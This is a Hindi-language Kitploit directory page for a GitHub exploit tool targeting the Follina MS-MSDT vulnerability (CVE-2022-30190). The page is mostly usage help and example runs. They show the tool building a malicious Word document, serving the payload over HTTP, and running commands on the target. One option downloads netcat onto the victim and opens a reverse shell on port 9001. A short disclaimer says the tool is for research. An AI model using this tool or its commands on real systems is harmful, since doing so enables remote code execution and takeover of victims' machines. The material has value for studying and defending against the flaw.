Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FOLLINA-CVE-2022-30190 — FOLLINA-CVE-2022-30190 का कार्यान्वयन | Kitploit
उपकरण/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

FOLLINA-CVE-2022-30190 का कार्यान्वयन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
113 साल पहलेअभी तक समीक्षित नहीं
साझा करें

FOLLINA-CVE-2022-30190

FOLLINA-CVE-2022-30190 का कार्यान्वयन


यह रिपॉजिटरी भेद्यता FOLLINA-CVE-2022-30190 के लिए एक शोषण उपकरण शामिल करता है।

अस्वीकरण

यह उपकरण सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए विकसित किया गया है। इस उपकरण को क्लोन/फोर्क करने पर, मूल डेवलपर उपयोगकर्ताओं के कार्यों के लिए किसी भी जिम्मेदारी से इनकार करता है।


प्रारंभिक आवश्यकताएँ

  1. CVE-2022-30190 के बारे में यहाँ पढ़ें।
  2. अपना परीक्षण वातावरण तैयार करें (मैं Virtual Box + Vagrant का उपयोग करने का सुझाव देता हूँ)
  • VirtualBox को यहाँ से डाउनलोड करें
  • Vagrant को यहाँ से डाउनलोड करें
  • Vagrant CLI के बारे में यहाँ पढ़ें

एक दुर्भावनापूर्ण Microsoft Word दस्तावेज़ के साथ "Follina" MS-MSDT हमला बनाएं और एक HTTP सर्वर के साथ पेलोड को स्टेज करें।

उपयोग
root@kitploit:~
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

उदाहरण

calc.exe चलाएँ:

root@kitploit:~
$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

cmd.exe चलाएँ:

root@kitploit:~
$ python3 exploit.py --command "cmd"

पोर्ट 9001 पर एक रिवर्स शेल प्राप्त करें। ध्यान दें, यह पीड़ित पर एक netcat बाइनरी डाउनलोड करता है और इसे C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता। इससे एंटीवायरस का पता लगने का ट्रिगर होगा जब तक कि AV अक्षम न किया गया हो।

root@kitploit:~
$ python3 exploit.py --reverse 9001
टूल डाउनलोड करें